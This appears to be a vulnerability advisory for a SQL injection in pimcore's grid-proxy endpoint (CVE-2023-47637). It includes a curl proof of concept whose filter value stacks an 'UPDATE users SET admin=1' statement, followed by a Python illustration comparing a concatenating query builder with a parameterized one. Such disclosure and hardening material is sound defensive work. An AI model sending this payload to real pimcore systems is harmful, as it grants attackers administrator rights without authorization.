SQL Injection Affecting pimcore/pimcore package, versions <11.1.1
Threat Intelligence: EPSS 0.07% (33rd percentile)
Snyk ID: SNYK-PHP-PIMCOREPIMCORE-6062173
- published: 16 Nov 2023
- disclosed: 15 Nov 2023
- credit: Florian Märkl
- introduced: 15 Nov 2023
CVE-2023-47637
How to fix?
Upgrade pimcore/pimcore to version 11.1.1 or higher.
Overview
pimcore/pimcore is a content & product management framework (CMS/PIM/E-Commerce).
Affected versions of this package are vulnerable to SQL Injection via the /admin/object/grid-proxy endpoint. A user with Objects permission can execute arbitrary SQL statements by invoking Multiselect in the getFilterCondition() function, and escalate their privileges to admin.
PoC
#!/bin/bash
BASE_URL=http://localhost:8084 # REPLACE THIS!
CSRF_TOKEN="bd89fd7ceb3b541dd63c200fd4fc8c8ea3cc1a05" # REPLACE THIS!
COOKIE="PHPSESSID=a0f408f9af7657430a4e6a1608c80277" # REPLACE THIS!
SQL="UPDATE users SET admin=1"
FILTER_JSON="[{\"property\":\"tags\",\"operator\":\"=\",\"type\":\"list\",\"value\":[\"')); ${SQL}; --\"]}]"
curl "${BASE_URL}/admin/object/grid-proxy?classId=EV&folderId=1119" \
-X POST \
-H "X-pimcore-csrf-token: ${CSRF_TOKEN}" \
-H "Cookie: ${COOKIE}" \
--data "filter=$FILTER_JSON"
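The injection described in the overview works because the values of a multiselect filter end up spliced into the SQL text of the grid query, so a value that closes the quoted string and the surrounding parentheses can append its own statement. The following Python is an added example, not pimcore's code and not the actual body of getFilterCondition(): it models a hypothetical filter builder in its vulnerable form (string concatenation) and its hardened form (allowlisted column identifier plus one bound placeholder per value), and runs both against an in-memory SQLite database with the PoC's payload. The table names, columns, the ALLOWED_COLUMNS set and the parenthesis depth of the query template are assumptions chosen for the illustration; sqlite3's executescript stands in for a database driver that accepts stacked statements, which is what the PoC relies on.

```python
import sqlite3

# Constructed from the advisory's PoC: the value closes the quoted string and the
# surrounding parentheses, stacks an UPDATE, and comments out the rest of the query.
INJECTED_VALUE = "')); UPDATE users SET admin=1; --"

# Hypothetical allowlist: column identifiers cannot be bound as parameters,
# so they have to be validated separately from the values.
ALLOWED_COLUMNS = {"tags", "name"}


def build_condition_unsafe(column, values):
    """Hypothetical vulnerable filter builder (not pimcore's code): each selected
    value is quoted by string concatenation and spliced into an IN (...) list.
    The parenthesis depth of the template matches the shape the PoC payload targets."""
    quoted = ", ".join("'%s'" % v for v in values)
    return "SELECT id FROM objects WHERE (%s IN (%s))" % (column, quoted)


def build_condition_safe(column, values):
    """Hardened form: validated identifier, one '?' placeholder per value, and the
    values handed to the driver as parameters so they can only ever be data."""
    if column not in ALLOWED_COLUMNS:
        raise ValueError("unknown filter column: %r" % column)
    if not values:
        # An empty IN () list is a syntax error on some databases; match nothing instead.
        return "SELECT id FROM objects WHERE 0=1", []
    placeholders = ", ".join("?" for _ in values)
    sql = "SELECT id FROM objects WHERE (%s IN (%s))" % (column, placeholders)
    return sql, list(values)


def fresh_db():
    """In-memory toy schema (assumed) standing in for the users and object tables."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, admin INTEGER NOT NULL DEFAULT 0);
        INSERT INTO users(name) VALUES ('alice'), ('bob');
        CREATE TABLE objects(id INTEGER PRIMARY KEY, tags TEXT);
        INSERT INTO objects(tags) VALUES ('red'), ('blue');
    """)
    return con


def admin_count(con):
    """Number of users carrying the admin flag after the query ran."""
    return con.execute("SELECT COUNT(*) FROM users WHERE admin=1").fetchone()[0]


def run_unsafe(values):
    """Run the concatenated query and report how many users ended up with admin=1.
    executescript stands in for a driver that accepts stacked statements."""
    con = fresh_db()
    con.executescript(build_condition_unsafe("tags", values))
    return admin_count(con)


def run_safe(values):
    """Run the parameterized query; returns (admin users, matching object rows)."""
    con = fresh_db()
    sql, params = build_condition_safe("tags", values)
    rows = con.execute(sql, params).fetchall()
    return admin_count(con), len(rows)


if __name__ == "__main__":
    print("unsafe builder, PoC value -> admins:", run_unsafe([INJECTED_VALUE]))
    print("safe builder,   PoC value -> (admins, rows):", run_safe([INJECTED_VALUE]))
    print("safe builder,   benign    -> (admins, rows):", run_safe(["red", "blue"]))
```

With the concatenating builder the PoC value turns the single SELECT into a SELECT followed by an UPDATE, and both users come back with admin=1; with the parameterized builder the same value is compared as an ordinary string, matches no row, and the users table is untouched. The identifier allowlist matters as much as the placeholders: a column name taken from the request cannot be bound, so it needs its own check.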
CVSS Scores (version 3.1)